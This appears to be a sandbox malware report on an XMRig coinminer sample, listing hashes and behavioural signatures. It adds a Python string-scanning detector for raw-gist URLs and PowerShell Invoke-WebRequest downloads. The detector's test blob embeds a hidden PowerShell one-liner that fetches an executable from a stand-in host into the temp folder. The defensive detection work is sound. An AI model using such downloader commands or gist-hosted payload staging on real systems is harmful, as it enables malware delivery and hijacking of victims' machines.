General

  • Target

    8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

  • Size

    1.9MB

  • Sample

    240510-aah77aef8x

  • MD5

    610762c5b8d40c7bd7586439a6c28bb5

  • SHA1

    00ef8c785ba01e71fd97b315584fcf95db9464c0

  • SHA256

    8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

  • SHA512

    767a4370d490d4f429fecc44e9fc6eaf7e60b0510b334b74d04df1c99573273f316cbeec37b1bd051e1a93285588bebde21abc665643c667b513dc3c18e7149d

  • SSDEEP

    49152:T1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrSax91MkibTIDiH3gPe:T1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rl

Score
10/10

Malware Config

Targets

    • Target

      8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

    • Size

      1.9MB

    • MD5

      610762c5b8d40c7bd7586439a6c28bb5

    • SHA1

      00ef8c785ba01e71fd97b315584fcf95db9464c0

    • SHA256

      8b3be07cd0133d5e97281f764b5f7b6ba59563438b0ef75e2958bda83c0891f8

    • SHA512

      767a4370d490d4f429fecc44e9fc6eaf7e60b0510b334b74d04df1c99573273f316cbeec37b1bd051e1a93285588bebde21abc665643c667b513dc3c18e7149d

    • SSDEEP

      49152:T1G1NtyBwTI3ySZbrkXV1etEKLlWUTOfeiRA2R76zHrSax91MkibTIDiH3gPe:T1ONtyBeSFkXV1etEKLlWUTOfeiRA2Rl

    Score
    10/10
    • xmrig

      XMRig is a high-performance, open-source, cross-platform CPU/GPU miner; its presence in a sample that nothing on the page identifies as a mining tool is the basis for the coinminer verdict.

    • Detects executables containing URLs to the raw contents of a GitHub gist (gist.githubusercontent.com, a legitimate host frequently used to stage payloads)

    • XMRig Miner payload

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell (ATT&CK T1059.001)

      PowerShell Invoke-WebRequest used to download content.

    • Executes dropped EXE

    • Loads dropped DLL

    • Legitimate hosting services abused for malware hosting/C2
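
The two static signatures above (raw-gist URL embedded in an executable, PowerShell Invoke-WebRequest download) are string heuristics that can be reproduced offline. The following is an added example written for this page, not the sandbox's own rule logic: it pulls ASCII and UTF-16LE printable runs out of a byte blob the way strings(1) does, matches them against the two patterns, and maps hits back to the signature names used in the report. The regexes, the MIN_LEN threshold, and the SAMPLE blob (including the gist URL and example.invalid host) are constructed assumptions, not bytes from the reported file.

```python
"""Heuristics behind two of the report's signatures: an executable that
embeds a URL to the raw contents of a GitHub gist, and a PowerShell
Invoke-WebRequest download command. Added example; the regexes, the
MIN_LEN threshold and the SAMPLE blob are assumptions, not the sandbox's
rules or bytes from the reported file.
"""
import re
from typing import Dict, Iterator, List

MIN_LEN = 6  # minimum printable run to count as a string, as strings(1) does

# Narrow (ASCII) and wide (UTF-16LE) printable runs; PowerShell one-liners
# inside PE resources or .NET binaries are commonly stored as UTF-16LE.
ASCII_RE = re.compile(rb"[\x20-\x7e]{%d,}" % MIN_LEN)
WIDE_RE = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % MIN_LEN)

# gist.githubusercontent.com/<user>/<gist-id>/raw[/<revision>][/<file>]
GIST_RAW_RE = re.compile(
    r"https?://gist\.githubusercontent\.com/[\w.-]+/[0-9a-f]+/raw(?:/[\w.-]+)*",
    re.IGNORECASE,
)
# Invoke-WebRequest, or its built-in alias iwr, followed by a positional or
# -Uri URL argument.
IWR_RE = re.compile(
    r"\b(?:Invoke-WebRequest|iwr)\s+(?:-Uri\s+)?['\"]?(https?://[^\s'\"]+)",
    re.IGNORECASE,
)


def extract_strings(data: bytes) -> Iterator[str]:
    """Yield printable runs, ASCII first, then UTF-16LE decoded to str."""
    for m in ASCII_RE.finditer(data):
        yield m.group().decode("ascii")
    for m in WIDE_RE.finditer(data):
        yield m.group().decode("utf-16le")


def scan(data: bytes) -> Dict[str, List[str]]:
    """Return the raw-gist URLs and Invoke-WebRequest targets found in data."""
    gist_urls: List[str] = []
    iwr_urls: List[str] = []
    for s in extract_strings(data):
        for url in GIST_RAW_RE.findall(s):
            if url not in gist_urls:
                gist_urls.append(url)
        for url in IWR_RE.findall(s):
            if url not in iwr_urls:
                iwr_urls.append(url)
    return {"gist_raw_urls": gist_urls, "iwr_urls": iwr_urls}


def signatures(data: bytes) -> List[str]:
    """Map findings onto the signature names used in the report above."""
    found = scan(data)
    hits: List[str] = []
    if found["gist_raw_urls"]:
        hits.append("Detects executables containing URLs to raw contents of a Github gist")
    if found["iwr_urls"]:
        hits.append("Command and Scripting Interpreter: PowerShell")
    return hits


# Constructed stand-in for a dropper: fake MZ/PE header bytes, an ASCII
# gist URL, NUL padding, then a UTF-16LE PowerShell downloader one-liner.
# None of this is taken from the reported sample.
SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60 + b"PE\x00\x00" + b"\x00" * 16
    + b"https://gist.githubusercontent.com/example-user/0123456789abcdef/raw/loader.ps1"
    + b"\x00" * 8
    + ("powershell -nop -w hidden -c \"iwr -Uri 'https://example.invalid/x.exe' "
       "-OutFile $env:TEMP\\x.exe\"").encode("utf-16le")
    + b"\x00" * 8
)

if __name__ == "__main__":
    for name, urls in scan(SAMPLE).items():
        print(name, urls)
    print(signatures(SAMPLE))
```

Run against a real dropped executable with `scan(open(path, "rb").read())`. A URL on gist.github.com (the HTML view, not the raw endpoint) deliberately does not match, and the wide-string pass is what catches PowerShell commands stored as UTF-16LE, which a plain ASCII strings dump misses.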

MITRE ATT&CK Enterprise v15

Tasks